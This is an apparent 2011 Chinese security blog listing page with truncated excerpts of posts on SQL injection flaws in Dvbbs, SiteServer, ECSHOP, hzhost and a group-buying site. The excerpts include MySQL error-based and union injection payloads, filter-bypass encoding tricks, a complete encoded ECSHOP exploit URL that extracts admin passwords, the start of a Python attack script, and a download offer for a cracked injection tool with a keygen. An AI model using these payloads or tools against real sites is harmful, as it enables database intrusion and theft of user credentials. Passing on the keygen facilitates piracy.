Dvbbs8.2 sql 版login.asp远程sql注入漏洞

   
分类:安全 | 2011-11-3 | 撸过 902 次
0人扯蛋

今日在学PHP的时候,一个朋友给我发来一个站,让帮忙做个安检,发现站有个论坛是dvbbs的,呵呵,这可是个漏洞不断的家伙啊。。
最新版本的又暴了远程SQL注入漏洞!
下面提供该漏洞的分析及利用!

【漏洞描述】中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
【漏洞分析】Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全
【漏洞等级】高危
【代码分析】

passwo[......]

继续阅读

SiteServer 3.4.4最新SQL注入0day

   
分类:安全 | 2011-10-27 | 撸过 1,293 次
0人扯蛋

这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,

但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,

看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:

SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)

下载地址:http://www.siteserver.cn/download客户案例:http://www.siteserver.cn/customer

也百度了一下,发现客户数量还是不少的。

漏洞描述:问题出在UserCenter.Pages.DLL中的Re[......]

继续阅读

简述Php脚本注入技术

   
分类:安全 | 2011-10-17 | 撸过 858 次
0人扯蛋

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只需将提交的变量中的所有单引号、双引号、反斜线和空字告符自动转换为含有反斜线的转义字符。如把“’”变成“\”,把“\”变成“\\”,就ok了。下面我们分为对magic_quotes_gpc=off和ma[......]

继续阅读

MYSQL高级报错注入

   
分类:安全 | 2011-10-11 | 撸过 1,987 次
0人扯蛋

and (select count(*) from mysql.user)>0/*

 

1、查看MYSQL版本

and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)

 

2、爆所有库

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x2[......]

继续阅读

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞

   
分类:安全 | 2011-10-11 | 撸过 2,076 次
0人扯蛋

这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.

 
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:
 
 
 
程序代码Function SafeRequest(ParaName)
 
Dim ParaValue
 
ParaValue=Request(ParaName)
 
if IsNumeric(ParaValue) then
 
SafeRequest=ParaValue
 
exit Function
 
else
 
ParaValuetemp=lcase(ParaVal[......]

继续阅读

防注入通用手段

   
分类:技术 | 2011-10-3 | 撸过 718 次
0人扯蛋

一般通用过滤字符串的关键字有以下这些:
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115[......]

继续阅读

PHP+MySQL 手工注入语句

   
分类:安全 | 2011-09-30 | 撸过 1,397 次
0人扯蛋

暴字段长度
order by num/*

匹配字段
and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息
version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*

操作系统信息:
and[......]

继续阅读

穿山甲注入工具Pangolin.Professinal.Edition.v3.2.5.1137专业版加注册机发布

   
分类:工具 | 2011-09-23 | 撸过 2,237 次
6人扯蛋

图改天在上吧!先上附件。

绝对的好用不出错不是破解版哦!

 

 

 

下载地址:Pangolin v3.2.5.1137专业版_注册机
网盘地址:Pangolin v3.2.5.1137专业版_注册机[......]

继续阅读

ECSHOP 搜索注入漏洞出现错误的解决办法!

   
分类:安全 | 2011-09-23 | 撸过 1,162 次
0人扯蛋

ECSHOP 利用网上的EXP:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

 

 

返回:
MySQL server error rep[......]

继续阅读

窝窝团SQL注入漏洞

   
分类:安全 | 2011-09-21 | 撸过 836 次
0人扯蛋

注册页面 校验email和用户名的地方使用了Ajax POST 数据到服务器端检测,但是过滤仅在客户端进行。使用脚本或者浏览器工具可以轻松绕过。

以下为测试代码(python):
import httplib, urllib

import sys

 

if len(sys.argv) < 2:

exit(0)

 

headers = {

“Accept”: “*/*”,

“Accept-Language”: “zh-CN,zh;q=0.8″,

“Content-Type”: “application/x-www-form-urlencoded”,[......]

继续阅读